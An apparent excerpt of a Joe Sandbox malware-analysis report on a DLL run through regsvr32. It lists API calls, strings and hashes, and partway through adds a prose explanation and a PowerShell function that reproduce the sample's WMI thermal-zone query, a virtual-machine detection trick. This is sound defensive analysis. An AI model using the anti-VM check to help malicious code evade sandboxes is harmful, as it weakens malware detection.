• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: Variant$Prop$Clear$CompareErrorInfo
• String ID:
• API String ID: 2171276625-0
APIs
• abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
• abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
• abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
• abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
• abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
• abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
• abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
• abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
• abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: abort
• String ID:
• API String ID: 4206212132-0
APIs
• RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,00000001), ref: 6C87CCEA
• RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,00000800,00020019,00000001), ref: 6C87CD7B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000800,00020019,00000001), ref: 6C87CDA9
  • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
Strings
• ProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 6C87CC7D
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: QueryValue$FreeHeapOpen
• String ID: ProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber ()
• API String ID: 3674198676-3947172187
APIs
• memcpy.MSVCRT(000000B4,?,?), ref: 6C8BC558
• memcpy.MSVCRT(00000000,00000003,00000002), ref: 6C8BC570
• memcpy.MSVCRT(-000001EC,?,?), ref: 6C8BC5F3
• memcpy.MSVCRT(000000B4,?,?), ref: 6C8BC838
Strings
• assertion failed: old_right_len + count <= CAPACITY, xrefs: 6C8BCCF1
• assertion failed: old_left_len >= count, xrefs: 6C8BCD02
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: memcpy
• String ID: assertion failed: old_left_len >= count$assertion failed: old_right_len + count <= CAPACITY
• API String ID: 3510742995-1889375005
APIs
• memset.MSVCRT ref: 6C9284FB
• memcpy.MSVCRT(00000001,?,00000001,00000000,00000001,+NaNinf00e00E0assertion failed: ndigits > 0,00000001,?,assertion failed: parts.len() >= 6,00000022,6C98F300,assertion failed: buf[0] > b'0',0000001F,6C98F2CC,assertion failed: !buf.is_empty(),00000021), ref: 6C92851C
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: memcpymemset
• String ID: .0.$assertion failed: !buf.is_empty()$assertion failed: buf[0] > b'0'$assertion failed: parts.len() >= 4$assertion failed: parts.len() >= 6$eEe-E--+NaNinf00e00E0assertion failed: ndigits > 0
• API String ID: 1297977491-753802538
APIs
• GetCurrentThreadId.KERNEL32 ref: 02633F55
• SetLastError.KERNEL32(0000139F,?,02645054,02633628), ref: 02634044
  • Part of subcall function 02632B80: SwitchToThread.KERNEL32 ref: 02632BAA
• send.WS2_32(?,02647440,00000010,00000000), ref: 02633FB6
• SetEvent.KERNEL32(?), ref: 02633FD9
• InterlockedExchange.KERNEL32(?,00000000), ref: 02633FE5
• WSACloseEvent.WS2_32(?), ref: 02633FF3
• shutdown.WS2_32(?,00000001), ref: 0263400B
• closesocket.WS2_32(?), ref: 02634015
Memory Dump Source
• Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
Similarity
• API ID: EventThread$CloseCurrentErrorExchangeInterlockedLastSwitchclosesocketsendshutdown
• String ID:
• API String ID: 518013673-0
APIs
• SetLastError.KERNEL32(00000000), ref: 6C8D4719
• GetEnvironmentVariableW.KERNEL32(?,00000002,00000000,00000000), ref: 6C8D4724
• GetLastError.KERNEL32(00000200,?,00000000,00000000,?,00000002,00000000,00000000), ref: 6C8D472F
• GetLastError.KERNEL32(00000200,?,00000000,00000000,?,00000002,00000000,00000000), ref: 6C8D4740
Strings
• environment variable not foundenvironment variable was not valid unicode: , xrefs: 6C8D4967
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: ErrorLast$EnvironmentVariable
• String ID: environment variable not foundenvironment variable was not valid unicode:
• API String ID: 2691138088-3632183283
APIs
• memmove.MSVCRT(?,?,?), ref: 6C8BCA8A
• memmove.MSVCRT(00000005,?,00000000), ref: 6C8BCAA2
• memcpy.MSVCRT(?,?,?), ref: 6C8BCAE9
• memcpy.MSVCRT(?,00000001,?), ref: 6C8BCB0A
• memmove.MSVCRT(?,?,00000000), ref: 6C8BCC8F
• memcpy.MSVCRT(?,?,?), ref: 6C8BCCAE
Strings
• assertion failed: old_left_len >= count, xrefs: 6C8BCD02
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: memcpymemmove
• String ID: assertion failed: old_left_len >= count
• API String ID: 167125708-4051586546
                                                                  • Opcode ID: 5345edf0fcae3003e8c972bf54e227368fa73f4d85a8ada5c7ecdf344a66f09e
                                                                  • Instruction ID: d64e5ef82f80d5ee769e5f02b382e9142faa625e19bb62d60d741368d6c62613
                                                                  • Opcode Fuzzy Hash: 5345edf0fcae3003e8c972bf54e227368fa73f4d85a8ada5c7ecdf344a66f09e
                                                                  • Instruction Fuzzy Hash: 45A18375D00E1A8BDB15CF68C850AEEB7B5FF99344F14436AD8097B202DB31EA56CB90
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 6C8F23C0
                                                                  • GetModuleFileNameW.KERNEL32(00000000,00000002,00000000,00000000), ref: 6C8F23C9
                                                                  • GetLastError.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000002,00000000,00000000), ref: 6C8F23D4
                                                                  • GetLastError.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000002,00000000,00000000), ref: 6C8F23E1
                                                                  • GetLastError.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000002,00000000,00000000), ref: 6C8F2457
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 6C8F2505
                                                                  • GetLastError.KERNEL32(?), ref: 6C8F2530
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CurrentDirectoryFileModuleName
                                                                  • String ID:
                                                                  • API String ID: 1505103792-0
                                                                  • Opcode ID: ba07fdfb4d89320fc64c8a51aa30894ed355b20b697755ffc137707017584348
                                                                  • Instruction ID: 39a5a44bda171f4e1421cb4669711ed20e9156404dd10a420fd60e3908ae91d8
                                                                  • Opcode Fuzzy Hash: ba07fdfb4d89320fc64c8a51aa30894ed355b20b697755ffc137707017584348
                                                                  • Instruction Fuzzy Hash: 5F5126B1D002499BEB20DFA8CD89BEFB7B4BF15348F140924E824B7740E7798D0587A1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID:
                                                                  • API String ID: 269201875-0
                                                                  • Opcode ID: bc655f66725c4cc28e72ea1f37ef93ba4951298a8b79aa7d8469c82ae5f96c9d
                                                                  • Instruction ID: 28a87a5a082ea87a084897c1f5940c228b887a3b5a8ed4a56030294f61500e43
                                                                  • Opcode Fuzzy Hash: bc655f66725c4cc28e72ea1f37ef93ba4951298a8b79aa7d8469c82ae5f96c9d
                                                                  • Instruction Fuzzy Hash: C55119B6A00115CFD714EF58D984869BBA6FF8831872A81BDD50A5F322D732BC43CB91
                                                                  APIs
                                                                  • _free.LIBCMT ref: 02631878
                                                                  • _free.LIBCMT ref: 026318B6
                                                                  • _free.LIBCMT ref: 026318F5
                                                                  • _free.LIBCMT ref: 02631935
                                                                  • _free.LIBCMT ref: 0263195D
                                                                  • _free.LIBCMT ref: 02631981
                                                                  • _free.LIBCMT ref: 026319B9
                                                                    • Part of subcall function 02637009: HeapFree.KERNEL32(00000000,00000000,?,02639A24,00000000,?,0263A0B0,?,00000001,?,?,0263C10B,00000018,02647C70,0000000C,0263C19B), ref: 0263701F
                                                                    • Part of subcall function 02637009: GetLastError.KERNEL32(00000000,?,02639A24,00000000,?,0263A0B0,?,00000001,?,?,0263C10B,00000018,02647C70,0000000C,0263C19B,?), ref: 02637031
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 5475982ba0b8bf660b958cb985a83a4e899beb0cdc9510cdb5514797786fc4fb
                                                                  • Instruction ID: a1fb11c9c27f8747c38229c1b023cef3c7bdb3609eb6db68df17c0708875c0f4
                                                                  • Opcode Fuzzy Hash: 5475982ba0b8bf660b958cb985a83a4e899beb0cdc9510cdb5514797786fc4fb
                                                                  • Instruction Fuzzy Hash: 53513BB6A00115CFC706DF48C480969BBB6FF8A31872980AED54E6B351D732EC42CF91
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(02645EB4,?,02637822,02647B80,00000014), ref: 02639BF2
                                                                  • __mtterm.LIBCMT ref: 02639BFE
                                                                    • Part of subcall function 026398C9: RtlDecodePointer.NTDLL(026491C8), ref: 026398DA
                                                                    • Part of subcall function 026398C9: TlsFree.KERNEL32(026491CC,02639D60,?,02637822,02647B80,00000014), ref: 026398F4
                                                                    • Part of subcall function 026398C9: _free.LIBCMT ref: 0263C070
                                                                  • TlsAlloc.KERNEL32(?,02637822,02647B80,00000014), ref: 02639C8B
                                                                  • __init_pointers.LIBCMT ref: 02639CB0
                                                                  • __calloc_crt.LIBCMT ref: 02639D1E
                                                                  • GetCurrentThreadId.KERNEL32 ref: 02639D4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 347030822-0
                                                                  • Opcode ID: a8b9ed24eb4b7dfcb820ff44d9dfa037647e7c264feb23903140c9d9c7825ae4
                                                                  • Instruction ID: eecb5f1c708fffb81968668adb625a0434bf4bca12fc83205923ca20ca8c5ea1
                                                                  • Opcode Fuzzy Hash: a8b9ed24eb4b7dfcb820ff44d9dfa037647e7c264feb23903140c9d9c7825ae4
                                                                  • Instruction Fuzzy Hash: BD318F39D813159BD72AAF75F84861EBBE5AB403287142D1AE481C3390DBB4D0B1CF40
                                                                  APIs
                                                                  • SysAllocString.OLEAUT32(WQL), ref: 6C861EB2
                                                                  • SysAllocString.OLEAUT32(SELECT * FROM MSAcpi_ThermalZoneTemperature), ref: 6C861EC1
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 6C861EE3
                                                                  • SysFreeString.OLEAUT32(?), ref: 6C861EEB
                                                                    • Part of subcall function 6C892680: SysFreeString.OLEAUT32(8904C483), ref: 6C89268D
                                                                  Strings
                                                                  • SELECT * FROM MSAcpi_ThermalZoneTemperature, xrefs: 6C861EBC
                                                                  • WQL, xrefs: 6C861EAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: String$Free$Alloc
                                                                  • String ID: SELECT * FROM MSAcpi_ThermalZoneTemperature$WQL
                                                                  • API String ID: 986138563-2989581318
                                                                  • Opcode ID: 100ef789db2e76685ec82bab2144961be6500448f6b33dce41eea9477e28ef39
                                                                  • Instruction ID: 474ae3c8aa4e1ece6205c27d90242b37d8709982c0823f819fcb26c6e02b9d55
                                                                  • Opcode Fuzzy Hash: 100ef789db2e76685ec82bab2144961be6500448f6b33dce41eea9477e28ef39
                                                                  • Instruction Fuzzy Hash: 9421D8B1C016099BCB11DFA9C945EEFF7B8BF54308F108925E4197BA01E774E948CBA1
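The WQL string in the function above (`SELECT * FROM MSAcpi_ThermalZoneTemperature`, allocated via SysAllocString at 6C861EC1 together with the `WQL` dialect string) is a query commonly used as a virtualization heuristic, because many hypervisors and sandbox images do not expose ACPI thermal zones through the root\WMI provider. The PowerShell below is an added example that reproduces that query on the analysis host and classifies the outcome; it is not code from the sample, from the Joe Sandbox IDA plugin, or from this report. The function name Test-ThermalZoneQuery and the three result labels are assumptions chosen for illustration.

```powershell
# Added example (not from the sample or the report): run the same WQL query the
# function above issues and classify what the host returns.
function Test-ThermalZoneQuery {
    [CmdletBinding()]
    param()

    # Identical query string to the one recovered from the dump at 6C861EBC.
    $query = 'SELECT * FROM MSAcpi_ThermalZoneTemperature'

    try {
        # The class lives under root\WMI, not the default root\cimv2 namespace.
        $zones = @(Get-CimInstance -Namespace 'root\WMI' -Query $query -ErrorAction Stop)
    } catch {
        # Typical on hypervisors and sandboxes: provider absent or "Not supported".
        return [pscustomobject]@{
            Result = 'query-failed'        # assumed label
            Error  = $_.Exception.Message
            Zones  = @()
        }
    }

    if ($zones.Count -eq 0) {
        return [pscustomobject]@{ Result = 'no-thermal-zones'; Error = $null; Zones = @() }
    }

    # CurrentTemperature is reported in tenths of a Kelvin; convert to Celsius.
    $readings = foreach ($z in $zones) {
        [pscustomobject]@{
            Instance = $z.InstanceName
            Celsius  = [math]::Round(($z.CurrentTemperature / 10) - 273.15, 1)
        }
    }
    return [pscustomobject]@{ Result = 'thermal-zones-present'; Error = $null; Zones = $readings }
}

Test-ThermalZoneQuery | Format-List
```

Running this inside the same analysis VM tells you which outcome the sample observed when it executed the query at 6C861EC1: a `query-failed` or `no-thermal-zones` result is what a bare virtual machine usually produces, while a physical host normally returns one or more zones with plausible temperatures.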
                                                                  APIs
                                                                  • SysStringLen.OLEAUT32 ref: 6C892255
                                                                  • SysStringLen.OLEAUT32 ref: 6C89225D
                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 6C892272
                                                                  • SysStringLen.OLEAUT32(00000000), ref: 6C89227E
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 6C8922A7
                                                                  Strings
                                                                  • called `Result::unwrap()` on an `Err` valueObject has been over-released., xrefs: 6C8922C5, 6C8923B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFree
                                                                  • String ID: called `Result::unwrap()` on an `Err` valueObject has been over-released.
                                                                  • API String ID: 344208780-2674442498
                                                                  • Opcode ID: 6fae7ea3824f581ea6d227adc872b497279036be2c0aae54b70c385544ee28b6
                                                                  • Instruction ID: 54eb170c85a8f54738043b84adf5698c859832725c14c3163677b579f12d58ad
                                                                  • Opcode Fuzzy Hash: 6fae7ea3824f581ea6d227adc872b497279036be2c0aae54b70c385544ee28b6
                                                                  • Instruction Fuzzy Hash: 4211E9B29022156BEB2096AD5E449EFB29CAFA111CF510934EC14F7B01EB78CD0981F3
                                                                  APIs
                                                                    • Part of subcall function 6C8A6140: memcpy.MSVCRT(?,?,00000404), ref: 6C8A6275
                                                                  • memcpy.MSVCRT(?,?,00000408), ref: 6C8A68F3
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A699A
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6A3A
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6ADA
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6B7A
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6C1A
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6CBA
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6D56
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: 53365d4b4b8d99eb170c4abb3071092a4bec8040746d4f892d840d5623b3b803
                                                                  • Instruction ID: 29be121dff3f8b60964de6edd74427179a57fd41fa9e01faf07dcf754a7e4c1b
                                                                  • Opcode Fuzzy Hash: 53365d4b4b8d99eb170c4abb3071092a4bec8040746d4f892d840d5623b3b803
                                                                  • Instruction Fuzzy Hash: 1BE1B872D01A1D9BCB21CF68CD415EFB3B5FF4A389F144658E91977201D731AA4ACBA0
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(-00000001,00000000,?,00000000,00000000,?,6C8EAD6B,00000000,?,6C8F53E6), ref: 6C903CF9
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,6C8F53E6), ref: 6C903D56
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,6C8F53E6), ref: 6C903D62
                                                                  • TlsGetValue.KERNEL32(00000000,6C8F53E6), ref: 6C903D93
                                                                  • TlsGetValue.KERNEL32(-00000001,00000000,00000000,00000000,00000000,?,00000004,0000000C,?,00000000,6C8F53E6), ref: 6C903DC5
                                                                  • TlsGetValue.KERNEL32(00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903DE7
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903E38
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903E41
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: 3f41d1548ad7689dc379ca40caa105f1b5c847d26d3cb7c3287144f0a7a986a3
                                                                  • Instruction ID: c4ec0c9aadbaa37f386ac6b8f088b797b069dbe1f9c8849b5509be279884b168
                                                                  • Opcode Fuzzy Hash: 3f41d1548ad7689dc379ca40caa105f1b5c847d26d3cb7c3287144f0a7a986a3
                                                                  • Instruction Fuzzy Hash: B7414879701611AFE7104B788C40FAB7AADBF92A58F14453EEA08C7B41EBB1D814C6B1
                                                                  APIs
                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,026491B4,00000000,?,00000000,026361A0,00000000), ref: 02635A75
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(026363A0,00000000), ref: 02635C6F
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(026363B8,00000000), ref: 02635C90
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(02636300,00000000), ref: 02635B14
                                                                    • Part of subcall function 02631280: __CxxThrowException@8.LIBCMT ref: 02631290
                                                                    • Part of subcall function 02631280: RtlDeleteCriticalSection.NTDLL(00000000), ref: 026312A1
                                                                  • InterlockedExchange.KERNEL32(026361B8,00000000), ref: 02635D01
                                                                  • timeGetTime.WINMM ref: 02635D07
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CountInitializeSpin$CreateDeleteEventException@8ExchangeInterlockedThrowTimetime
                                                                  • String ID:
                                                                  • API String ID: 2093779962-0
                                                                  • Opcode ID: 8672cec46af8d49efd9b81af274ef302f62f6ba3e7b3b38774ed336931d610ec
                                                                  • Instruction ID: da7cf0bbe77ae72cd9d4dfc49ab873426b51391d2e217b4bd9e436d0530b0521
                                                                  • Opcode Fuzzy Hash: 8672cec46af8d49efd9b81af274ef302f62f6ba3e7b3b38774ed336931d610ec
                                                                  • Instruction Fuzzy Hash: FFA102B0A01B46AFD315DF6AC88479AFBE8FB08304F90462EE16DC7640D774A964CF94
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: strlen
                                                                  • String ID:
                                                                  • API String ID: 39653677-0
APIs
• TlsGetValue.KERNEL32(-00000001,00000004,00000008,?,00000000,6C86BEF3), ref: 6C86F198
• TlsGetValue.KERNEL32(00000000), ref: 6C86F219
• TlsSetValue.KERNEL32(00000000,00000000,00000000), ref: 6C86F225
• TlsGetValue.KERNEL32(00000000,?,00000004,00000008,?,00000000,6C86BEF3), ref: 6C86F256
• memset.MSVCRT ref: 6C86F299
• RtlGetVersion.NTDLL ref: 6C86F2B2
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: Value$Versionmemset
